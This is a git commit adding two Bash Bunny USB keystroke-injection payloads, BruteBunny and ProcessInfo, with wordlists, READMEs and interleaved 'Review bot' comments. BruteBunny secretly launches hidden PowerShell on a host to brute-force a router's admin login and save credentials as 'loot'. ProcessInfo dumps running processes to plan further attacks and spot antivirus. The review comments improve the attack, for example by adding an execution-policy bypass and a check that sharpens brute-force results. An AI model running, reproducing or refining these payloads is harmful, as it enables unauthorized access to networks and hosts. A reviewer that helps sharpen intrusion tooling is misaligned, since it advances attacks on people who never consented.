Added BruteBunny and ProcessInfo payloads (#140)

This commit is contained in:
DeeKoy 2017-04-07 01:01:37 -04:00 committed by Sebastian Kinne
parent fc1d812d96
commit 945b5c14d9
7 changed files with 240 additions and 0 deletions


@ -0,0 +1,72 @@
<#
.SYNOPSIS
BruteBunny 1.0
.AUTHOR
Decoy. Thanks to nishang for original script inspiration.
.DESCRIPTION
This script is designed to Brute Force common usernames/passwords for the router (http basic authentication)
#>
$Protocol = "http"
$Hostname = "192.168.1.1"
$Port = 80
$Bunny = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
$UsernameList = $Bunny+"\BruteBunny\wordlists\usernames.txt"
$PasswordList = $Bunny+"\BruteBunny\wordlists\passwords.txt"
$StopOnSuccess = $true
$url = $Protocol + "://" + $Hostname + ":" + $Port + "/"
# Read in lists for usernames and passwords
$Usernames = Get-Content $UsernameList
$Passwords = Get-Content $PasswordList
# Does a depth first loop over usernames first, trying every password for each username sequentially in the list
:UNLoop foreach ($Username in $Usernames)
{
# Loops through passwords in the list sequentially
foreach ($Password in $Passwords)
{
# Starts a new web client
$WebClient = New-Object Net.WebClient
# Sets basic authentication credentials for web client
$SecurePassword = ConvertTo-SecureString -AsPlainText -String $Password -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username, $SecurePassword
$WebClient.Credentials = $Credential
Try
{
# Prints the target
$url | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
# Prints the credentials being tested
$message = "Checking $Username : $Password" | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$message | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$content = $webClient.DownloadString($url) | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
# Continues on to print succesful credentials
$success = $true
#$success
if ($success -eq $true)
{
# Prints succesful auths to highlight legit creds
$message = "[*] Match found! $Username : $Password" | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$message | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$content | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
if ($StopOnSuccess)
{
break UNLoop
}
}
}
Catch
{
# Print any error we receive
$success = $false
$message = $error[0].ToString() | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$message | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
}
}
}
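Review bot: `$success = $true` at L52 is reached for any response that does not throw, so a target that serves a 200 without demanding credentials (a form-based login page, or a device whose auth is disabled) is reported as `[*] Match found!` on the very first username/password pair; a pre-flight unauthenticated request that aborts unless the server answers 401 would remove that false positive. The logging is also partly lost: `$message = "Checking $Username : $Password" | Out-File …` assigns nothing to `$message`, so L49 and L58 append blank lines, and `$content` is empty for the same reason so the page body is never written at L59 — pipe straight into `Out-File` without the assignment. `$Bunny` is never checked; if the volume lookup returns nothing, the wordlist and log paths silently become `\BruteBunny\…` on the current drive. Note also that `loot\log.txt` records every tried credential pair and the authenticated page body in plaintext on the removable drive, which is by design for this tool but worth stating in the header.
```powershell
# … unchanged: variable setup and wordlist loading …
# Abort unless the target actually challenges for credentials; otherwise every pair "succeeds".
$Probe = New-Object Net.WebClient
Try
{
    $Probe.DownloadString($url) | Out-Null
    "[!] $url served the page without a credential challenge; aborting" | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
    return
}
Catch [System.Net.WebException]
{
    # Response is null on connect failures, which casts to 0 and also aborts
    $Status = [int]$_.Exception.Response.StatusCode
    if ($Status -ne 401)
    {
        "[!] Unexpected response $Status from $url; aborting" | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
        return
    }
}
# … unchanged: username/password loops …
```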


@ -0,0 +1,9 @@
admin
Admin
adm
Adm
administrator
Administrator
administrador
Administrador
root


@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: BruteBunny
# Author: Decoy
# Version: 1.0
# Category: Password Recovery
# Target: Windows XP SP3+
#
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
# access to the admin panel.
# init
LED R B
# need SWITCH_POSITION, so give it to me. please. thank you.
source bunny_helpers.sh
# set up the things to make it do stuff
mkdir -p /root/udisk/BruteBunny/loot
mkdir -p /root/udisk/BruteBunny/wordlists
# move wordlists to BruteBunny folder
cp /root/udisk/payloads/$SWITCH_POSITION/usernames.txt /root/udisk/BruteBunny/wordlists/usernames.txt
cp /root/udisk/payloads/$SWITCH_POSITION/passwords.txt /root/udisk/BruteBunny/wordlists/passwords.txt
sync;sleep 1;sync
# set attack mode
ATTACKMODE HID STORAGE
# wait for storage
LED R G B 100
QUACK DELAY 6000
QUACK GUI r
QUACK DELAY 100
# unleash the brute bunny
LED B 100
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
QUACK ENTER
sleep 10
# sync the stuff
sync;sleep 1;sync
LED G
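Review bot: L122 dot-sources `brutebunny.ps1` from the mass-storage volume without an execution-policy override, so on a host that keeps PowerShell's default Restricted policy the script is refused and the payload still ends green; the sibling ProcessInfo payload sidesteps this by typing inline commands. Change the line to `QUACK STRING powershell -NoP -NonI -W Hidden -Ep Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"`. The `sleep 10` at L124 is also shorter than the run will usually take — if the two 9-entry lists in this commit are the username and password lists, that is 81 sequential HTTP attempts plus per-request timeouts — so the final `sync` and green LED fire while the host is presumably still writing the log; the README asks users to tune this, but a more conservative default would be safer. The two `cp` lines at L110-L111 are unchecked; `cp … || { LED R; exit 1; }` would surface a missing list instead of the PowerShell loop quietly iterating over nothing.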


@ -0,0 +1,35 @@
# BruteBunny
* Author: Decoy
* Version: Version 1.0
* Target: Windows
## Description
I would say that some (most) people don't realize that devices they connect to their networks usually have
weak default usernames and passwords. The Brute Bunny will exploit that in hopes of finding some poor sap
who didn't change their admin password for their device, and educate them accordingly.
## Configuration
Modify the variables in brutebunny.ps1 to change the default IP/Port for this attack. Feel free to use your
own wordlists as well; however you will need to adjust some of the sleep times accordingly depending on the
length of time your list will take to go through.
## Notes
This was designed and tested on a Netgear Nighthawk Router, and an Arris Xfinity Modem/Router combo; however
I don't see why it couldn't be used for any internet connected device that uses basic http authentication.
And please... Don't feed the bunnies.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple | Reticulating splines |
| White (blinking) | Waiting for Storage |
| Blue (blinking) | Brute Bunny being a Brute Bunny |
| Green | Hopefully no bunny babies |
## Discussion
Not yet


@ -0,0 +1,9 @@
admin
Admin
adm
Adm
administrator
Administrator
administrador
Administrador
root


@ -0,0 +1,41 @@
#!/bin/bash
#
# Title: Process Info
# Author: Decoy
# Version: 1.0
# Category: Recon
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Storage
#
#
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking... ...Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished
# Initialization
LED R G 100
# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo
# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUCK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 3
# Sync File System
LED B 100
sync; sleep 1; sync
# Trap is clean
LED G
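Review bot: L200 reads `QUCK DELAY 1000`, which is not a Bash Bunny command, so no pause happens between launching PowerShell at L198-L199 and typing the `Get-Process` line; the line may be typed before the hidden console accepts input and be lost or land in the wrong window. It should be `QUACK DELAY 1000`, and given the script already allows 6000 ms for the Run dialog, a comparable wait for the console to start is probably the safer default. The `sleep 3` at L204 before `sync` likewise assumes `Get-Process | Format-List -Property *` has finished writing to the drive within three seconds, which nothing checks, so loot written after the sync may be truncated; the header comment at L184-L188 documents the intended LED phases and could note that the three-second window is a guess to be tuned.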


@ -0,0 +1,30 @@
# Process Info for Bash Bunny
* Author: Decoy
* Version: Version 1.0
* Target: Windows
## Description
This is just a quick and dirty payload to return all running processes under the current user.
This will return the path/filename/version, and quite a bit of other info as well. This information
can be useful for planning future attacks, such as taking advantage of buffer overflows, and other
various vulnerabilities to gain a more permanent foothold into a target system. It can also be
useful in identifying what AV is in use on a target system.
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber (blinking) | Setting up |
| Amber | Attack running |
| White (blinking) | Moving loot to mass storage |
| Blue (blinking) | Syncing File System |
| Green | Trap is clean |
## Discussion
https://forums.hak5.org/index.php?/topic/40605-payload-process-info/